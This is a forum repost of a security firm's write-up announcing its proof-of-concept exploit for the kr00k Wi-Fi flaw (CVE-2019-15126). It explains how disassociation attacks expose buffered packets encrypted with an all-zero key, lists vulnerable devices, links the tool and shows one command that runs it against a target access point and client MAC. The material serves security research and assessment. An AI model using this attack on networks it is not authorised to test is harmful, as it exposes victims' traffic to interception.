Jump to content
Sign in to follow this  

r00kie-kr00kie. Exploring the kr00k attack

Recommended Posts

r00kie-kr00kie. Exploring the kr00k attack


We created and published a PoC exploit of the kr00k attack (CVE-2019-15126😞 https://github.com/hexway/r00kie-kr00kie

All technical details can be found in the Process section.


In February 2020, ESET released the KR00K - CVE-2019-15126 SERIOUS VULNERABILITY DEEP INSIDE YOUR WI-FI ENCRYPTION research. The vulnerability works as follows:

  1. The victim connects to a WiFi hotspot
  2. The adversary sends disassociation requests to the client and, by doing so, disconnects the victim from the hotspot
  3. Wireless Network Interface Controllers (WNIC) WiFi chip of the client clears out a session key (Temporal Key) used for traffic decryption
  4. However, data packets, which can still remain in the buffer of the WiFi chip after the disassociation, will be encrypted with an all-zero encryption key and sent.
  5. The adversary intercepts all the packets sent by the victim after the disassociation and attempts to decrypt them using a known key value (which, as we remember, is set to zero)


Figure 1. Not quite obvious, but if you look closely, then it’s a clear diagram that we took from ESET’s whitepaper


The following devices were claimed vulnerable:

  • Amazon Echo 2nd gen
  • Amazon Kindle 8th gen
  • Apple iPad mini 2
  • Apple iPhone 6, 6S, 8, XR
  • Apple MacBook Air Retina 13-inch 2018
  • Google Nexus 5
  • Google Nexus 6
  • Google Nexus 6P
  • Raspberry Pi 3
  • Samsung Galaxy S4 GT-I9505
  • Samsung Galaxy S8
  • Xiaomi Redmi 3S

So, since we have Raspberry Pi 3 ready at hand, let's find out whether Kr00k actually works. Surely, ESET researchers or some community members have already published a PoC, haven't they?


Umm, Google found nothing but a pile of FUDs and an empty GitHub repository.

Ok, let's make it ourselves.

UPDATE: while we were drawing the logo for this publication, Thice Security posted a PoC as well.


The kr00k attack is quite straightforward. So, it didn't take much time for us to write our PoC.

To check whether a device is vulnerable, it'll suffice to run the r00kie-kr00kie.py python script with bssid, channel number, and the victim's mac address used as parameters and to have a bit of patience.

->~:python3 r00kie-kr00kie.py -i wlan0 -b D4:38:9C:82:23:7A -c 88:C9:D0:FB:88:D1 -l 11


After testing this PoC on different devices, we found out that the data of the clients that generated plenty of UDP traffic was the easiest to intercept. Among those clients, for example, there are various streaming apps because this kind of traffic (unlike small TCP packets) will always be kept in the buffer of a WiFi chip.

BTW, here is another couple of devices we've used to prove the attack does work:

  • Sony Xperia Z3 Compact (D5803)
  • Huawei Honor 4X

All in all, now you have another tool you can use during one of your Red Team projects or security assessments of your clients' WiFi networks: https://github.com/hexway/r00kie-kr00kie

Do not forget to have a look at the Process section. There you'll find more details about this PoC development and the way it works.

You are welcome!


Sursa: https://hexway.io/research/r00kie-kr00kie/

Share this post

Link to post
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

Sign in to follow this  

  • Create New...